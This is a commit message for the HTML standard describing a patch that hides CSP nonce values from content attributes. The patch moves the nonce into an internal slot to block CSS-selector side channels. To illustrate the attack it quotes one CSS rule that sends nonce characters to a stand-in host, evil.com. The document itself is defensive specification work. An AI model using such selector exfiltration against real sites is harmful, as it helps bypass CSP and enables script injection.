Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Some [recent attacks on CSP][1] rely on the ability to exfiltrate nonce data via various mechanisms that can read content attributes. CSS selectors are the best example: through clever use of prefix/postfix text matching selectors values can be sent out to an attacker's server for reuse (e.g., `script[nonce=a] { background: url("https://evil.com/nonce?a");}`). This patch mitigates the risk of this class of attack by hiding the nonce value from elements' content attributes by moving the `nonce` attributes into a new `NoncedElement` interface mixin, which is included into `HTMLElement`. That mixin defines the following behaviors for the `nonce` content attribute: 1. When the `nonce` content attribute is set or changed, its new value is copied into a `[[CryptographicNonce]]` slot on the element. 2. When a `NoncedElement` is inserted into a document which was delivered with a `Content-Security-Policy` header, the `nonce` content attribute is cleared out. The `nonce` IDL attribute getter and setter now operate on the `[[CryptographicNonce]]` slot's value rather than reflecting the content attribute, meaning that the nonce value remains exposed to script, but is opaque to non-script side-channels. Likewise, the `[[CryptographicNonce]]` slot's value is used when populating a request's cryptographic nonce metadata in order to deliver the nonce to CSP for validation. Tests: https://github.com/w3c/web-platform-tests/tree/master/content-security-policy/nonce-hiding Closes whatwg#2369. [1]: https://www.blackhat.com/docs/us-17/thursday/us-17-Lekies-Dont-Trust-The-DOM-Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf
- Loading branch information